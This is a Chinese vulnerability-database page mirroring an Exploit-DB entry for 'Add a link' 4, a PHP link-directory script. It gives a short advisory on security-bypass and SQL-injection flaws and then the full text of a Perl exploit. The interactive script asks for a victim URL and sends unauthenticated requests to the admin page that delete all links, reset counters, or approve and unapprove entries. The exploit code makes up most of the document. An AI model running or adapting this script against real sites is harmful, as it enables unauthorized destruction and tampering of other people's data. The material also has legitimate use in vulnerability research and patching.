Add a link 4 - Security Bypass / SQL Injection

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1056850 漏洞类型
发布时间 2008-09-17 更新时间 2008-09-17
CVE编号 N/A CNNVD-ID N/A
漏洞平台 PHP CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/32392
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/31228/info

Add a link is prone to multiple security vulnerabilities, including multiple security-bypass issues and an SQL-injection issue.

Exploiting the security-bypass issues may allow an attacker to bypass certain security restrictions and perform unauthorized actions. The attacker can exploit the SQL-injection issue by manipulating the SQL query logic to carry out unauthorized actions on the underlying database. This will compromise the application and may aid in further attacks.

These issues affect Add a link 4 and prior versions. 

# addalink <= 4 Arbitrary Admin Access Vulnerability Exploit
# url: http://sourceforge.net/projects/addalink/
#
# Author: JosS
# mail: sys-project[at]hotmail[dot]com
# site: http://spanish-hackers.com
# team: Spanish Hackers Team - [SHT]
#
# This was written for educational purpose. Use it at your own risk.
# Author will be not responsible for any damage.
#
# Greetz To: All Hackers and milw0rm website

#!/usr/bin/perl

use HTTP::Request;
use LWP::UserAgent;

print "Insert host/path:(ex: http://www.site.com/linkliste/)\n";
$host=<STDIN>;
chomp $host;
print "\n";

# Si la url no tiene http: al principio
  if ( $host   !~   /^http:/ ) {

    # lo añadimos
    $host = 'http://' . $host;
}

# Si la url no tiene / al final
  if ( $host   !~   /\/$/ ) {

    # lo añadimos
    $host = $host . '/';
}

print " Victim: $host \n\n";

menu:;



print "Menu:\n";

print "\n";



print "1.  Reset all counters\n";

print "2.  Delete all links\n";

print "3.  Approve all links\n";

print "4.  Unapprove all links\n";
print "";
print "5.  Exit\n\n";

print "Option:";

$opcion=<STDIN>;



if ($opcion>=1 && $opcion<=5 ) 

{



if ($opcion==1)

{

&Reset_all_counters

}

if ($opcion==2)

{

&Delete_all_links

}

if ($opcion==3)

{

&Approve_all_links

}

if ($opcion==4)

{

&Unapprove_all_links

}

if ($opcion==5)

{

exit(1);

}}

else
{
print "Option incorrect\n";

goto menu;
}

####

sub Reset_all_counters
{

$poc="admin/read_links.php?action=resetcounter";

$final="$host$poc";
my $req=HTTP::Request->new(GET=>$final);
my $ua=LWP::UserAgent->new();
$ua->timeout(30);
my $response=$ua->request($req);

print "\n$final\n";

if ($response->is_success) {
print "[+] Reset all counters\n\n";
}
else {
print "[-] Reset all counters\n\n";
}

print "\n";

print "Press enter to go to menu.";

$volver=<STDIN>;

goto menu;

}

###

sub Delete_all_links
{

$poc="admin/read_links.php?action=deleteall";

$final="$host$poc";
my $req=HTTP::Request->new(GET=>$final);
my $ua=LWP::UserAgent->new();
$ua->timeout(30);
my $response=$ua->request($req);

print "\n$final\n";

if ($response->is_success) {
print "[+] Delete all links\n\n";
}
else {
print "[-] Delete all links\n\n";
}

print "\n";

print "Press enter to go to menu.";

$volver=<STDIN>;

goto menu;

}

###

sub Approve_all_links
{

$poc="admin/read_links.php?action=approveall";

$final="$host$poc";
my $req=HTTP::Request->new(GET=>$final);
my $ua=LWP::UserAgent->new();
$ua->timeout(30);
my $response=$ua->request($req);

print "\n$final\n";

if ($response->is_success) {
print "[+] Approve all links\n\n";
}
else {
print "[-] Approve all links\n\n";
}

print "\n";

print "Press enter to go to menu.";

$volver=<STDIN>;

goto menu;

}

###

sub Unapprove_all_links
{

$poc="admin/read_links.php?action=unapproveall";

$final="$host$poc";
my $req=HTTP::Request->new(GET=>$final);
my $ua=LWP::UserAgent->new();
$ua->timeout(30);
my $response=$ua->request($req);

print "\n$final\n";

if ($response->is_success) {
print "[+] Unapprove all links\n\n";
}
else {
print "[-] Unapprove all links\n\n";
}

print "\n";

print "Press enter to go to menu.";

$volver=<STDIN>;

goto menu;

}

# __EOF__